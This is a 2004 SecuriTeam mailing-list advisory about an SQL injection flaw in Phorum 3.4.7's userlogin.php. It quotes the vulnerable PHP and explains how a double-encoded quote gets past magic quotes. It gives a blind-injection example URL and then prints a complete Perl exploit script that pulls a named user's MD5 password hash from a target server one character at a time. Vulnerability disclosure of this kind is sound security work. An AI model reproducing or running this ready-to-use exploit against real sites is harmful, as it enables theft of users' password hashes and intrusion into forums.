[UNIX] Phorum SQL Injection (userlogin.php)

• Previous message: SecuriTeam: "[UNIX] Linux Kernel Setsockopt MCAST_MSFILTER Integer Overflow Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 21 Apr 2004 18:42:48 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Phorum SQL Injection (userlogin.php)
------------------------------------------------------------------------

SUMMARY

 <http://www.phorum.org/> Phorum is "an Open Source web based discussion
software application written in PHP".

An SQL injection vulnerability exists in the 'userlogin.php' script.
Disclosure of sensitive information from the database is therefore
possible.

DETAILS

Vulnerable Systems:
 * Phorum version 3.4.7

Examining the code from the 'include/userlogin.php' script:
// checks the session for the currently logged in user
  function phorum_check_session($admin_session='')
  {
      global $q, $DB, $PHORUM, $HTTP_COOKIE_VARS, $phorum_uriauth;
         
      $phorum_uriauth=urldecode($phorum_uriauth);

      if(!empty($admin_session)) {
        list($user, $pass)=explode(":", $admin_session);

        if(!get_magic_quotes_gpc()) $user=addslashes($user);
      } elseif(isset($HTTP_COOKIE_VARS['phorum_cookieauth'])) {
        // part for cookieauth
        list($user, $pass)=explode(":",
$HTTP_COOKIE_VARS['phorum_cookieauth']);
        if(!get_magic_quotes_gpc()) $user=addslashes($user);
      } elseif(isset($phorum_uriauth)) {
        // part for uriauth
        list($user, $second)=explode(":",$phorum_uriauth);

        if(!empty($user) && empty($second))
            list($user, $second)=explode("%3A",$phorum_uriauth);
    
        $SQL="Select password,combined_token from
".$PHORUM['auth_table']." where username='$user'";

      $q->query($DB, $SQL);
      $r=$q->getrow();
      ...

It is evident that the GET parameter $phorum_uriauth will be URL decoded
and if the $admin_session parameter is empty AND the cookie parameter
$phorum_cookieauth isn't set, the URL decoded $phorum_uriauth will be
divided to it's $user and $second. The $user part is then passed to an SQL
query without escaping dangerous characters which is done in addslashes().

Although "Magic Quotes" is enabled and seems to secure the script
variables, if $phorum_uriauth initially contains something like "%2527",
it will be URL decoded into a single-quote ("'") and the "Magic Quotes"
feature can't protect against this type of behavior. An example HTTP
request that relies on knowledge of a username in the system is show
below:
http://localhost/phorum347/list.php?f=1&phorum_uriauth=waraxe%2527%20AND%20mid(password,2,1)=3/*:foobar

When issuing this request, if the user's password MD5 hash's second
character is '3', a normal page will be returned to the browser but with
the logout link. If a login link is returned instead, another attempt must
be made. By iterating all combinations like this it is possible to extract
the MD5 hash of the user one character at a time. This allows retrieval of
the MD5 hash even without the use of UNION statements such as those
present in more elaborate SQL queries. In turn this means that an even
older SQL database can be attacked.

Exploit:
An exploit for this vulnerability:
########################################################################
 #
                          #
 #
                          #
 # Sql injection exploit for Phorum 3.4.7
                          #
 #
                          #
 # For details look at http://www.waraxe.us/index.php?modname=sa&id=19
                          #
 #
                          #
 #
                          #
 ##################################################################
 
 $remote = 'localhost'; # hostname of the target
 $port = 80; # port number, usually 80
 $url = '/phorum347'; # path to Phorum, without ending "/"
 $username = 'test'; # username, who's info we will pull out
 
 
#----------------------------------------------------------------------------------------------------
 
 use IO::Socket;
 @chars =
('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
 $data = '';
 $md5hash = '';
 $url .= '/list.php?f=1';
 
 for($nr=1;$nr<33;$nr++)
 {
     for($cnt=0;$cnt<16;$cnt++)
     {
         $charx = @chars[$cnt];
         $uriauth = "$username%2527%20AND%20MID(password," . $nr .
',1)=%2527' . $charx .'%2527/*';
         $cookie = "phorum_uriauth=$uriauth";
         
         $data = MakeGetRequest($remote, $url ,$cookie);
         $match = isMatch($data);
 
         $logline = "pos --> " . $nr . " ,char for test --> " . $charx . "
 --> " . $match;
         print $logline . "\n";
 
         if($match == 1)
         {
             $md5hash .= @chars[$cnt];
             $logline = "current md5hash --> " . $md5hash;
             print $logline . "\n";
             break;
         }
     }
 }
 
 $logline = "Final md5hash --> " . $md5hash;
 print $logline . "\n";
 exit();
 
 sub MakeGetRequest()
 {
     $socket = IO::Socket::INET->new(PeerAddr => $remote,
                 PeerPort => $port,
                 Proto => "tcp",
                 Type => SOCK_STREAM)
                 or die "Couldnt connect to $remote:$port : $@\n";
     $str = "GET " . $url . " HTTP/1.0\r\n";
     print $socket $str;
     print $socket "Cookie: $cookie\r\n";
     print $socket "Host: $remote\r\n\r\n";
 
     $buff = "";
     while ($answer = <$socket>)
         {
                 $buff .= $answer;
          }
     close($socket);
     return $buff;
 }
 
 sub isMatch($data)
 {
     $idx1 = index($data,"<a href=\"login.php?logout=1");
     
     if($idx1 > -1)
     {
         $bingo = 1;
     }
     else
     {
         $bingo = 0;
     }
     
     return $bingo;
 }

ADDITIONAL INFORMATION

The information has been provided by <mailto:come2waraxe@yahoo.com> Janek
"waraxe" Vind.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] Linux Kernel Setsockopt MCAST_MSFILTER Integer Overflow Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]